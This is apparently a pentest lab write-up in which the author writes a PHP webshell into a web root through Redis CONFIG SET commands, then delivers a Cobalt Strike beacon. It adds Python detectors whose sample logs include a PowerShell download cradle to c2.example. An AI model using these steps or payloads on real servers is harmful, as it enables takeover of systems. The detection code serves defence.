I just had some fun in my testing lab with a Redis server. This morning, after waking up a bit early, I started my Kali Linux machine and thought about exercising my pentest skills. I found one lab involving a Redis server that is quite interesting.
I would like to share some post-exploitation steps based on the access we have on the Redis server. I assume you already have administrator access to the Redis server and are able to connect to it remotely.
First you need to connect to the server using redis-cli and specify the IP address:
redis-cli -h 10.129.218.54
Next, authenticate so that you can execute Redis commands on the server:
auth [PUT YOUR PASSWORD HERE]
Once authenticated, the next step is to set the Redis persistence directory. This is where we put our file, which will give us RCE:
config set dir C:\xampp\htdocs\
Let's set up the backdoor PHP file:
config set dbfilename grem.php
Since my Redis server is also hosting a PHP web application, we create a webshell called grem.php.
The next phase is to set the content of the PHP backdoor file:
set grem "<?php system($_REQUEST['me']); ?>"
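The three commands above leave a very recognisable trace on the Redis side: CONFIG SET dir pointing at a document root, CONFIG SET dbfilename ending in a script extension, and a SET whose value carries an opening PHP tag. The detector below is an added example written for this post (it is not the author's code and not part of any Redis tooling); it parses Redis MONITOR output, whose line format is assumed to be `<epoch> [<db> <client>] "CMD" "arg" ...`, and flags that sequence. The sample lines, client address and the list of web-root path fragments are constructed for the example.

```python
import re
import shlex
from dataclasses import dataclass

# Shape of a Redis MONITOR line: <epoch> [<db> <client-addr>] "CMD" "arg1" "arg2" ...
MONITOR_RE = re.compile(
    r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<argv>.+)$'
)

# Path fragments that should never be a Redis persistence directory;
# constructed starter list, extend it with your own document roots.
WEB_ROOT_HINTS = ("htdocs", "wwwroot", "inetpub", "public_html", "/var/www")
SCRIPT_EXTS = (".php", ".jsp", ".aspx", ".asp", ".cgi")
SCRIPT_MARKERS = ("<?php", "<?=", "<%", "#!/")


@dataclass
class Finding:
    ts: str
    client: str
    rule: str
    detail: str


def parse_monitor_line(line):
    """Split one MONITOR line into (timestamp, client, argv); None if malformed."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    try:
        # MONITOR double-quotes every token and escapes \ and " inside it,
        # which is the quoting shlex understands in POSIX mode.
        argv = shlex.split(m.group("argv"))
    except ValueError:
        return None
    return m.group("ts"), m.group("client"), argv


def detect(lines):
    """Return findings for the CONFIG SET / SET sequence that drops a script into a web root."""
    findings = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[2]:
            continue
        ts, client, argv = parsed
        cmd = argv[0].lower()          # Redis command names are case-insensitive
        if cmd == "config" and len(argv) >= 4 and argv[1].lower() == "set":
            param, value = argv[2].lower(), argv[3]
            if param == "dir" and any(h in value.lower() for h in WEB_ROOT_HINTS):
                findings.append(Finding(ts, client, "rdb-dir-to-webroot", value))
            elif param == "dbfilename" and value.lower().endswith(SCRIPT_EXTS):
                findings.append(Finding(ts, client, "rdb-filename-script", value))
        elif cmd in ("set", "setex", "setnx", "append", "mset"):
            # any argument after the command carrying a script opener is enough
            if any(mk in arg for arg in argv[1:] for mk in SCRIPT_MARKERS):
                findings.append(Finding(ts, client, "script-payload-in-value", argv[1]))
    return findings


# Constructed MONITOR capture mirroring the commands in the post; the client
# address is made up. Raw string so the doubled backslashes stay as MONITOR prints them.
SAMPLE_MONITOR = r"""
1714000000.100000 [0 10.0.0.5:51234] "auth" "(redacted)"
1714000000.200000 [0 10.0.0.5:51234] "config" "set" "dir" "C:\\xampp\\htdocs\\"
1714000000.300000 [0 10.0.0.5:51234] "config" "set" "dbfilename" "grem.php"
1714000000.400000 [0 10.0.0.5:51234] "set" "grem" "<?php system($_REQUEST['me']); ?>"
1714000000.500000 [0 127.0.0.1:40000] "get" "session:abc"
"""

if __name__ == "__main__":
    for f in detect(SAMPLE_MONITOR.splitlines()):
        print(f"{f.ts} {f.client} {f.rule}: {f.detail}")
```

MONITOR has a real throughput cost on a busy instance, so in production the same rules are better applied to a proxy capture or to Redis ACL/auth logs; the point of the example is the rule logic, which keys on CONFIG SET of dir and dbfilename rather than on a particular key name. On the hardening side, restricting or renaming CONFIG (rename-command or an ACL that denies it to application users) removes the primitive this whole chain depends on.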
Set up the foothold
As we have successfully created the backdoor, we can start the RCE. Let's test the backdoor with the command whoami.
Based on the result returned by the webshell, it looks like the backdoor is working perfectly, and we can see that the web server is running as NT AUTHORITY\SYSTEM.
I use Cobalt Strike for further activities such as hash dumping or lateral movement. With the capability we have above, we can deliver our beacon.
I use Scripted Web Delivery to install my beacon on the compromised host with the above configuration. Cobalt Strike will generate a one-liner that you can execute on the host or via our RCE.
Next, run the PowerShell command through the webshell we created before.
After waiting less than 5 seconds, we can see that a new beacon with the highest privilege is established.
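From the web server's side there are two durable artefacts of this chain. First, a file Redis writes as its dump is an RDB snapshot, so grem.php on disk begins with the bytes `REDIS` plus a version number and only contains the PHP tag somewhere in the middle; PHP still executes it because everything outside `<?php ... ?>` is passed through as output. Second, every command sent through the webshell by GET shows up in the access log as a query parameter. The script below is an added example written for this post (not the author's code, not part of XAMPP or Cobalt Strike); it walks a document root for script files carrying the RDB header, then matches access-log requests to those files whose parameters look like shell commands. The sample document root, the RDB byte layout (approximate), the log lines, the attacker IPs and the placeholder host c2.example are all constructed.

```python
import os
import re
import tempfile
from urllib.parse import parse_qs, urlsplit

RDB_MAGIC = b"REDIS"          # every RDB snapshot starts with "REDIS" + 4-digit version
SCRIPT_EXTS = (".php", ".jsp", ".aspx", ".asp")
# Strings a command parameter sent to a webshell tends to carry; constructed starter list.
SHELL_HINTS = ("whoami", "powershell", "cmd.exe", "cmd /c", "downloadstring",
               "certutil", "/bin/sh", "bash -c")

# Apache/nginx combined log format: ip ident user [ts] "METHOD target PROTO" status ...
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def find_rdb_backed_scripts(web_root):
    """Return web-root-relative paths of script files whose first bytes are an RDB header."""
    hits = []
    for dirpath, _, names in os.walk(web_root):
        for name in names:
            if not name.lower().endswith(SCRIPT_EXTS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                head = fh.read(len(RDB_MAGIC))
            if head == RDB_MAGIC:
                hits.append(os.path.relpath(path, web_root).replace(os.sep, "/"))
    return sorted(hits)


def suspicious_requests(log_lines, webshell_paths):
    """Return (ip, path, param, value) for requests to known webshell files with command-like params."""
    shells = {"/" + p for p in webshell_paths}
    out = []
    for line in log_lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path not in shells:
            continue
        # parse_qs URL-decodes and turns '+' into spaces, so hints match the real command text
        for name, values in parse_qs(parts.query).items():
            for value in values:
                if any(h in value.lower() for h in SHELL_HINTS):
                    out.append((m.group("ip"), parts.path, name, value))
    return out


def build_sample_web_root():
    """Constructed sample: a normal index.php plus a grem.php that Redis wrote as an RDB dump."""
    root = tempfile.mkdtemp(prefix="htdocs-")
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(b"<?php echo 'hello'; ?>")
    # Approximate RDB layout: magic+version, an aux field, SELECTDB 0, one string key, EOF.
    rdb_dump = (b"REDIS0011\xfa\x09redis-ver\x056.2.6\xfe\x00"
                b"\x00\x04grem\x21<?php system($_REQUEST['me']); ?>\xff")
    with open(os.path.join(root, "grem.php"), "wb") as fh:
        fh.write(rdb_dump)
    return root


# Constructed access-log excerpt: the whoami test, a normal visitor, and a download cradle.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [25/Apr/2024:10:00:01 +0000] "GET /grem.php?me=whoami HTTP/1.1" 200 64 "-" "curl/8.0"
10.0.0.7 - - [25/Apr/2024:10:00:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [25/Apr/2024:10:00:09 +0000] "GET /grem.php?me=powershell+-nop+-w+hidden+-c+IEX(New-Object+Net.WebClient).DownloadString(%27http://c2.example/a%27) HTTP/1.1" 200 0 "-" "curl/8.0"
"""

if __name__ == "__main__":
    root = build_sample_web_root()
    shells = find_rdb_backed_scripts(root)
    print("RDB-backed scripts:", shells)
    for hit in suspicious_requests(SAMPLE_ACCESS_LOG.splitlines(), shells):
        print("webshell use:", hit)
```

The on-disk check is the one to rely on: the webshell uses $_REQUEST, so commands sent by POST never reach the access log, but the REDIS header stays in the file regardless of how it is invoked. The same header check also catches the non-PHP variants of this technique (a dump written into a cron directory or an authorized_keys file has the same magic), which is why it is written against the file content rather than the name grem.php.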